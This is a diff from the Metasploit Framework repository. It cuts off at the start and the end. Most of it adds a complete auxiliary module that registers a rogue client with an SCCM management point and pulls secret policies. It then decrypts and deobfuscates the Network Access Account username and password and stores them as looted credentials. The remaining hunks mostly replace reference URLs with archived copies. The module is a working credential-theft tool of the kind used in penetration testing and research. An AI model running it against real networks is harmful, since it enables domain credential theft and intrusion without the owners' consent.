-          [ 'URL', 'https://www.metasploit.com/users/mc' ],
+          [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],
          [ 'URL' , 'http://www.red-database-security.com/scripts/sid.txt' ],
        ],
      'DisclosureDate' => '2009-01-07'))
@@ -0,0 +1,491 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'time'
+require 'nokogiri'
+require 'rasn1'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::LDAP
+  include Msf::OptionalSession::LDAP
+
+  KEY_SIZE = 2048
+  SECRET_POLICY_FLAG = 4
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Get NAA Credentials',
+        'Description' => %q{
+          This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.
+          This requires a computer account, which can be added using the samr_account module.
+        },
+        'Author' => [
+          'xpn',     # Initial research
+          'skelsec', # Initial obfuscation port
+          'smashery' # module author
+        ],
+        'References' => [
+          ['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],
+          ['URL', 'https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md'],
+          ['URL', 'https://github.com/Mayyhem/SharpSCCM'],
+          ['URL', 'https://github.com/garrettfoster13/sccmhunter']
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptAddressRange.new('RHOSTS', [ false, 'The domain controller (for autodiscovery). Not required if providing a management point and site code' ]),
+      OptPort.new('RPORT', [ false, 'The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code', 389 ]),
+      OptString.new('COMPUTER_USER', [ true, 'The username of a computer account' ]),
+      OptString.new('COMPUTER_PASS', [ true, 'The password of the provided computer account' ]),
+      OptString.new('MANAGEMENT_POINT', [ false, 'The management point (SCCM server) to use' ]),
+      OptString.new('SITE_CODE', [ false, 'The site code to use on the management point' ]),
+      OptInt.new('TIMEOUT', [ true, 'Number of seconds to wait for SCCM DB to update', 10 ]),
+    ])
+
+    @session_or_rhost_required = false
+  end
+
+  def find_management_point
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+
+      if (@base_dn = datastore['BASE_DN'])
+        print_status("User-specified base DN: #{@base_dn}")
+      else
+        print_status('Discovering base DN automatically')
+
+        if (@base_dn = ldap.base_dn)
+          print_status("#{ldap.peerinfo} Discovered base DN: #{@base_dn}")
+        else
+          fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
+        end
+      end
+      raw_objects = ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])
+      return nil unless raw_objects.any?
+
+      raw_obj = raw_objects.first
+
+      raw_objects.each do |ro|
+        print_good("Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})")
+      end
+
+      if raw_objects.length > 1
+        print_warning("Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})")
+      end
+
+      obj = {}
+      obj[:rhost] = raw_obj[:dnshostname].first
+      obj[:sitecode] = raw_obj[:mssmssitecode].first
+
+      obj
+    rescue Errno::ECONNRESET
+      fail_with(Failure::Disconnected, 'The connection was reset.')
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      fail_with(Failure::NoAccess, e.message)
+    rescue Net::LDAP::Error => e
+      fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+    end
+  end
+
+  def run
+    management_point = datastore['MANAGEMENT_POINT']
+    site_code = datastore['SITE_CODE']
+    if management_point.blank? != site_code.blank?
+      fail_with(Failure::BadConfig, 'Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)')
+    end
+
+    if management_point.blank?
+      begin
+        result = find_management_point
+        fail_with(Failure::NotFound, 'Failed to find management point') unless result
+        management_point = result[:rhost]
+        site_code = result[:site_code]
+      rescue ::IOError => e
+        fail_with(Failure::UnexpectedReply, e.message)
+      end
+    end
+
+    key, cert = generate_key_and_cert('ConfigMgr Client')
+
+    http_opts = {
+      'rhost' => management_point,
+      'rport' => 80,
+      'username' => datastore['COMPUTER_USER'],
+      'password' => datastore['COMPUTER_PASS'],
+      'headers' => {
+        'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept' => '*/*'
+      }
+    }
+
+    sms_id, ip_address = register_request(http_opts, management_point, key, cert)
+    print_status("Waiting #{datastore['TIMEOUT']} seconds for SCCM DB to update...")
+
+    sleep(datastore['TIMEOUT'])
+
+    secret_urls = get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id)
+    all_results = Set.new
+    secret_urls.each do |url|
+      decrypted_policy = request_policy(http_opts, url, sms_id, key)
+      results = get_creds_from_policy_doc(decrypted_policy)
+      all_results.merge(results)
+    end
+
+    if all_results.empty?
+      print_status('No NAA credentials configured')
+    end
+
+    all_results.each do |username, password|
+      report_creds(ip_address, username, password)
+      print_good("Found valid NAA credentials: #{username}:#{password}")
+    end
+  rescue SocketError => e
+    fail_with(Failure::Unreachable, e.message)
+  end
+
+  # Request the policy from the policy_url
+  def request_policy(http_opts, policy_url, sms_id, key)
+    policy_url.gsub!(%r{^https?://<mp>}, '')
+    policy_url = policy_url.gsub('{', '%7B').gsub('}', '%7D')
+
+    now = Time.now.utc.iso8601
+    client_token = "GUID:#{sms_id};#{now};2"
+    client_signature = rsa_sign(key, (client_token + "\x00").encode('utf-16le').bytes.pack('C*'))
+
+    opts = http_opts.merge({
+      'uri' => policy_url,
+      'method' => 'GET'
+    })
+    opts['headers'] = opts['headers'].merge({
+      'ClientToken' => client_token,
+      'ClientTokenSignature' => client_signature
+    })
+
+    http_response = send_request_cgi(opts)
+    http_response.gzip_decode!
+
+    ci = Rex::Proto::CryptoAsn1::Cms::ContentInfo.parse(http_response.body)
+    cms_envelope = ci.enveloped_data
+
+    ri = cms_envelope[:recipient_infos]
+    if ri.value.empty?
+      fail_with(Failure::UnexpectedReply, 'No recipient infos provided')
+    end
+
+    if ri[0][:ktri].nil?
+      fail_with(Failure::UnexpectedReply, 'KeyTransRecipientInfo not found')
+    end
+
+    body = cms_envelope[:encrypted_content_info][:encrypted_content].value
+
+    key_encryption_alg = ri[0][:ktri][:key_encryption_algorithm][:algorithm].value
+    encrypted_rsa_key = ri[0][:ktri][:encrypted_key].value
+    if key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSA_ENCRYPTION.value
+      decrypted_key = key.private_decrypt(encrypted_rsa_key)
+    elsif key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP.value
+      decrypted_key = key.private_decrypt(encrypted_rsa_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
+    else
+      fail_with(Failure::UnexpectedReply, "Key encryption routine is currently unsupported: #{key_encryption_alg}")
+    end
+
+    cea = cms_envelope[:encrypted_content_info][:content_encryption_algorithm]
+    algorithms = {
+      Rex::Proto::CryptoAsn1::OIDs::OID_AES256_CBC.value => { iv_length: 16, key_length: 32, cipher_name: 'aes-256-cbc' },
+      Rex::Proto::CryptoAsn1::OIDs::OID_DES_EDE3_CBC.value => { iv_length: 8, key_length: 24, cipher_name: 'des-ede3-cbc' }
+    }
+    if algorithms.include?(cea[:algorithm].value)
+      alg_hash = algorithms[cea[:algorithm].value]
+      if decrypted_key.length != alg_hash[:key_length]
+        fail_with(Failure::UnexpectedReply, "Bad key length: #{decrypted_key.length}")
+      end
+      iv = RASN1::Types::OctetString.new
+      iv.parse!(cea[:parameters].value)
+      if iv.value.length != alg_hash[:iv_length]
+        fail_with(Failure::UnexpectedReply, "Bad IV length: #{iv.length}")
+      end
+      cipher = OpenSSL::Cipher.new(alg_hash[:cipher_name])
+      cipher.decrypt
+      cipher.key = decrypted_key
+      cipher.iv = iv.value
+
+      decrypted = cipher.update(body) + cipher.final
+    else
+      fail_with(Failure::UnexpectedReply, "Decryption routine is currently unsupported: #{cea[:algorithm].value}")
+    end
+
+    decrypted.force_encoding('utf-16le').encode('utf-8').delete_suffix("\x00")
+  end
+
+  # Retrieve all the policies with secret components in them
+  def get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id)
+    computer_user = datastore['COMPUTER_USER'].delete_suffix('$')
+    fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
+    hex_pub_key = make_ms_pubkey(cert.public_key)
+    guid = SecureRandom.uuid.upcase
+    sent_time = Time.now.utc.iso8601
+    sccm_host = management_point.downcase
+    request_assignments = "<RequestAssignments SchemaVersion=\"1.00\" ACK=\"false\" RequestType=\"Always\"><Identification><Machine><ClientID>GUID:#{sms_id}</ClientID><FQDN>#{fqdn}</FQDN><NetBIOSName>#{computer_user}</NetBIOSName><SID /></Machine><User /></Identification><PolicySource>SMS:#{site_code}</PolicySource><Resource ResourceType=\"Machine\" /><ServerCookie /></RequestAssignments>\x00"
+    request_assignments.encode!('utf-16le')
+    body_length = request_assignments.bytes.length
+    request_assignments = request_assignments.bytes.pack('C*') + "\r\n"
+    compressed = Rex::Text.zlib_deflate(request_assignments)
+
+    payload_signature = rsa_sign(key, compressed)
+
+    client_id = "GUID:{#{sms_id.upcase}}\x00"
+    client_ids_signature = rsa_sign(key, client_id.encode('utf-16le'))
+    header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook2 Name=\"clientauth\"><Property Name=\"AuthSenderMachine\">#{computer_user}</Property><Property Name=\"PublicKey\">#{hex_pub_key}</Property><Property Name=\"ClientIDSignature\">#{client_ids_signature}</Property><Property Name=\"PayloadSignature\">#{payload_signature}</Property><Property Name=\"ClientCapabilities\">NonSSL</Property><Property Name=\"HashAlgorithm\">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{#{guid}}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceID>GUID:#{sms_id}</SourceID><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_PolicyManager</TargetAddress><TargetEndpoint>MP_PolicyManager</TargetEndpoint><TargetHost>#{sccm_host}</TargetHost><Timeout>60000</Timeout></Msg>"
+
+    message = Rex::MIME::Message.new
+    message.bound = 'aAbBcCdDv1234567890VxXyYzZ'
+
+    message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
+    message.add_part(compressed, 'application/octet-stream', 'binary')
+    opts = http_opts.merge({
+      'uri' => '/ccm_system/request',
+      'method' => 'CCM_POST',
+      'data' => message.to_s
+    })
+    opts['headers'] = opts['headers'].merge({
+      'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
+    })
+    http_response = send_request_cgi(opts)
+    response = Rex::MIME::Message.new(http_response.to_s)
+
+    fail_with(Failure::UnexpectedReply, 'No content received in request for policies, try increasing TIMEOUT or rerunning the module.') unless response.parts[1]&.content
+    compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
+    xml_doc = Nokogiri::XML(compressed_response.encode('utf-8'))
+    policies = xml_doc.xpath('//Policy')
+    secret_policies = policies.select do |policy|
+      flags = policy.attributes['PolicyFlags']
+      next if flags.nil?
+
+      flags.value.to_i & SECRET_POLICY_FLAG == SECRET_POLICY_FLAG
+    end
+
+    urls = secret_policies.map do |policy|
+      policy.xpath('PolicyLocation/text()').text
+    end
+
+    urls = urls.reject(&:blank?)
+
+    urls.each do |url|
+      print_status("Found policy containing secrets: #{url}")
+    end
+
+    urls
+  end
+
+  # Sign the data using the RSA key, and reverse it (strange, but it's what's required)
+  def rsa_sign(key, data)
+    signature = key.sign(OpenSSL::Digest.new('SHA256'), data)
+    signature.reverse!
+
+    signature.unpack('H*')[0].upcase
+  end
+
+  # Make a pubkey structure (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb)
+  def make_ms_pubkey(pub_key)
+    result = "\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31"
+    result += [KEY_SIZE, pub_key.e].pack('II')
+    result += [pub_key.n.to_s(16)].pack('H*')
+
+    result.unpack('H*')[0]
+  end
+
+  # Make a request to the SCCM server to register our computer
+  def register_request(http_opts, management_point, key, cert)
+    pub_key = cert.to_der.unpack('H*')[0].upcase
+
+    computer_user = datastore['COMPUTER_USER'].delete_suffix('$')
+    fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
+    sent_time = Time.now.utc.iso8601
+    registration_request_data = "<Data HashAlgorithm=\"1.2.840.113549.1.1.11\" SMSID=\"\" RequestType=\"Registration\" TimeStamp=\"#{sent_time}\"><AgentInformation AgentIdentity=\"CCMSetup.exe\" AgentVersion=\"5.00.8325.0000\" AgentType=\"0\" /><Certificates><Encryption Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Encryption><Signing Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Signing></Certificates><DiscoveryProperties><Property Name=\"Netbios Name\" Value=\"#{computer_user}\" /><Property Name=\"FQ Name\" Value=\"#{fqdn}\" /><Property Name=\"Locale ID\" Value=\"1033\" /><Property Name=\"InternetFlag\" Value=\"0\" /></DiscoveryProperties></Data>"
+
+    signature = rsa_sign(key, registration_request_data.encode('utf-16le'))
+
+    registration_request = "<ClientRegistrationRequest>#{registration_request_data}<Signature><SignatureValue>#{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"
+
+    rr_utf16 = ''
+    rr_utf16 << registration_request.encode('utf-16le').bytes.pack('C*')
+    body_length = rr_utf16.length
+    rr_utf16 << "\r\n"
+
+    header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{5DD100CD-DF1D-45F5-BA17-A327F43465F8}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_ClientRegistration</TargetAddress><TargetEndpoint>MP_ClientRegistration</TargetEndpoint><TargetHost>#{management_point.downcase}</TargetHost><Timeout>60000</Timeout></Msg>"
+
+    message = Rex::MIME::Message.new
+    message.bound = 'aAbBcCdDv1234567890VxXyYzZ'
+
+    message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
+    message.add_part(Rex::Text.zlib_deflate(rr_utf16), 'application/octet-stream', 'binary')
+
+    opts = http_opts.merge({
+      'uri' => '/ccm_system_windowsauth/request',
+      'method' => 'CCM_POST',
+      'data' => message.to_s
+    })
+    opts['headers'] = opts['headers'].merge({
+      'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
+    })
+    http_response = send_request_cgi(opts)
+    if http_response.nil?
+      fail_with(Failure::Unreachable, 'No response from server')
+    end
+    ip_address = http_response.peerinfo['addr']
+    response = Rex::MIME::Message.new(http_response.to_s)
+    if response.parts.empty?
+      html_doc = Nokogiri::HTML(http_response.to_s)
+      error = html_doc.xpath('//title').text
+      if error.blank?
+        error = 'Bad response from server'
+        dlog('Response from server:')
+        dlog(http_response.to_s)
+      end
+      fail_with(Failure::UnexpectedReply, error)
+    end
+
+    response.parts[0].content.force_encoding('utf-16le').encode('utf-8').delete_prefix("\uFEFF")
+    compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
+    xml_doc = Nokogiri::XML(compressed_response.encode('utf-8')) # It's crazy, but XML parsing doesn't work with UTF-16-encoded strings
+    sms_id = xml_doc.root&.attributes&.[]('SMSID')&.value&.delete_prefix('GUID:')
+    if sms_id.nil?
+      approval = xml_doc.root&.attributes&.[]('ApprovalStatus')&.value
+      if approval == '-1'
+        fail_with(Failure::UnexpectedReply, 'Client registration not approved by SCCM server')
+      end
+      fail_with(Failure::UnexpectedReply, 'Did not retrieve SMS ID')
+    end
+    print_status("Got SMS ID: #{sms_id}")
+
+    [sms_id, ip_address]
+  end
+
+  # Extract obfuscated credentials from the resulting policy XML document
+  def get_creds_from_policy_doc(policy)
+    xml_doc = Nokogiri::XML(policy)
+    naa_sections = xml_doc.xpath(".//instance[@class='CCM_NetworkAccessAccount']")
+    results = []
+    naa_sections.each do |section|
+      username = section.xpath("property[@name='NetworkAccessUsername']/value").text
+      username = deobfuscate_policy_value(username)
+      username.delete_suffix!("\x00")
+
+      password = section.xpath("property[@name='NetworkAccessPassword']/value").text
+      password = deobfuscate_policy_value(password)
+      password.delete_suffix!("\x00")
+
+      unless username.blank? && password.blank?
+        # Deleted credentials seem to result in just an empty value for username and password
+        results.append([username, password])
+      end
+    end
+    results
+  end
+
+  def deobfuscate_policy_value(value)
+    value = [value.gsub(/[^0-9A-Fa-f]/, '')].pack('H*')
+    data_length = value[52..55].unpack('I')[0]
+    buffer = value[64..64 + data_length - 1]
+    key = mscrypt_derive_key_sha1(value[4..43])
+    iv = "\x00" * 8
+    cipher = OpenSSL::Cipher.new('des-ede3-cbc')
+    cipher.decrypt
+    cipher.iv = iv
+    cipher.key = key
+    result = cipher.update(buffer) + cipher.final
+
+    result.force_encoding('utf-16le').encode('utf-8')
+  end
+
+  def mscrypt_derive_key_sha1(secret)
+    buf1 = [0x36] * 64
+    buf2 = [0x5C] * 64
+
+    digest = OpenSSL::Digest.new('SHA1')
+    hash = digest.digest(secret).bytes
+
+    hash.each_with_index do |byte, i|
+      buf1[i] ^= byte
+      buf2[i] ^= byte
+    end
+
+    buf1 = buf1.pack('C*')
+    buf2 = buf2.pack('C*')
+
+    digest = OpenSSL::Digest.new('SHA1')
+    hash1 = digest.digest(buf1)
+
+    digest = OpenSSL::Digest.new('SHA1')
+    hash2 = digest.digest(buf2)
+
+    hash1 + hash2[0..3]
+  end
+
+  ## Create a self-signed private key and certificate for our computer registration
+  def generate_key_and_cert(subject)
+    key = OpenSSL::PKey::RSA.new(KEY_SIZE)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = (rand(0xFFFFFFFF) << 32) + rand(0xFFFFFFFF)
+    cert.public_key = key.public_key
+    cert.issuer = OpenSSL::X509::Name.new([['CN', subject]])
+    cert.subject = OpenSSL::X509::Name.new([['CN', subject]])
+    yr = 24 * 3600 * 365
+    cert.not_before = Time.at(Time.now.to_i - rand(yr * 3) - yr)
+    cert.not_after = Time.at(cert.not_before.to_i + (rand(4..9) * yr))
+    ef = OpenSSL::X509::ExtensionFactory.new
+    ef.subject_certificate = cert
+    ef.issuer_certificate = cert
+    cert.extensions = [
+      ef.create_extension('keyUsage', 'digitalSignature,dataEncipherment'),
+      ef.create_extension('extendedKeyUsage', '1.3.6.1.4.1.311.101.2, 1.3.6.1.4.1.311.101'),
+    ]
+    cert.sign(key, OpenSSL::Digest.new('SHA256'))
+
+    [key, cert]
+  end
+
+  def report_creds(ip_address, user, password)
+    service_data = {
+      address: ip_address,
+      port: rport,
+      protocol: 'tcp',
+      service_name: 'sccm',
+      workspace_id: myworkspace_id
+    }
+
+    domain, account = user.split(/\\/)
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: account,
+      private_data: password,
+      private_type: :password,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }
+    credential_core = create_credential(credential_data.merge(service_data))
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    create_credential_login(login_data.merge(service_data))
+  end
+end
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['OSVDB', '66842'],
-          ['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
+          ['URL', 'http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
          ['US-CERT-VU', '362332']
        ]
      ))
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['OSVDB', '66842'],
-          ['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
+          ['URL', 'http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
          ['US-CERT-VU', '362332']
        ]
      ))
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['OSVDB', '66842'],
-          ['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
+          ['URL', 'http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
          ['US-CERT-VU', '362332']
        ],
      'Actions'     =>
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['OSVDB', '66842'],
-          ['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
+          ['URL', 'http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
          ['US-CERT-VU', '362332']
        ],
      'Actions'     =>
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
      },
      'Author'        => 'wvu',
      'References'    => [
-        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
+        ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
        ['URL', 'http://www.wemo.com/']
      ],
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'References'     => [
          ['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],
-          ['URL', 'https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
+          ['URL', 'http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
          ['URL', 'https://nbulischeck.github.io/apple-safari-crash'],
        ],
        'DisclosureDate' => '2018-09-15',
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
      ],
      'References'     => [
        ['CVE', '2015-5477'],
-        ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
+        ['URL', 'http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
        ['URL', 'https://kb.isc.org/article/AA-01272']
      ],
      'DisclosureDate' => '2015-07-28',
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
      [
        [ 'CVE', '2017-7924' ],
        [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03' ],
-        [ 'URL', 'https://dl.acm.org/doi/10.1145/3174776.3174780']
+        [ 'URL', 'http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780']
      ])
      register_options([Opt::RPORT(44818),])
  end
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
+          [ 'URL', 'http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
          [ 'CVE', '2014-0781']
        ],
      'DisclosureDate' => '2014-03-10',
@@ -28,8 +28,8 @@ class MetasploitModule < Msf::Auxiliary
          ['CVE', '2014-0195'],
          ['ZDI', '14-173'],
          ['BID', '67900'],
-          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],
-          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']
+          ['URL', 'http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],
+          ['URL', 'http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']
        ],
      'DisclosureDate' => '2014-06-05'))

@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Auxiliary
          [ 'CVE', '2012-0002' ],
          [ 'MSB', 'MS12-020' ],
          [ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
-          [ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
-          [ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
+          [ 'URL', 'http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
+          [ 'URL', 'http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg' ],
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
          [ 'EDB', '18606' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
        'References' => [
          [ 'CVE', '2020-5724' ],
          [ 'CVE', '2020-5723'],
-          [ 'URL', 'https://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf'],
+          [ 'URL', 'http://web.archive.org/web/20230319062924/http://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf'],
          [ 'URL', 'https://raw.githubusercontent.com/tenable/poc/master/grandstream/ucm62xx/dump_http_user_creds.py']
        ],
        'DisclosureDate' => '2020-03-30',
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['EDB', '31459'],
-          ['URL', 'https://developer.joomla.org/security/578-20140301-core-sql-injection.html']
+          ['URL', 'http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html']
        ],
      'DisclosureDate' => '2014-03-02'
    ))
@@ -453,7 +453,8 @@ class MetasploitModule < Msf::Auxiliary
      groups = []
      entry['mspki-certificate-policy'].each do |certificate_policy_oid|
        policy = get_pki_object_by_oid(certificate_policy_oid)
-        next if policy['msds-oidtogrouplink'].blank?
+
+        next if policy&.[]('msds-oidtogrouplink').blank?

        # get the group and check it for two conditions
        group = get_group_by_dn(policy['msds-oidtogrouplink'].first)
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
          [ 'CVE', '2013-7331'],
          [ 'MSB', 'MS14-052' ],
          [ 'URL', 'https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/' ],
-          [ 'URL', 'https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi' ]
+          [ 'URL', 'http://web.archive.org/web/20240814143555/https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi' ]
        ],
      'Platform'       => 'win',
      'DisclosureDate' => '2014-09-09', # MSB. Used in the wild since Feb 2014
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'References' => [
          ['CVE', '2024-28995'],
-          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995'],
+          ['URL', 'http://web.archive.org/web/20250213123538/https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995'],
          ['URL', 'https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis']
        ],
        'DefaultOptions' => {
@@ -19,8 +19,8 @@ class MetasploitModule < Msf::Auxiliary
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-28987'],
-          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
-          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
+          ['URL', 'http://web.archive.org/web/20250212002353/https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
+          ['URL', 'http://web.archive.org/web/20250212002353/https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
          ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
        ],
        'DisclosureDate' => '2024-08-22',
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
        [
          ['CVE', '2016-2055'],
          ['PACKETSTORM', '135758'],
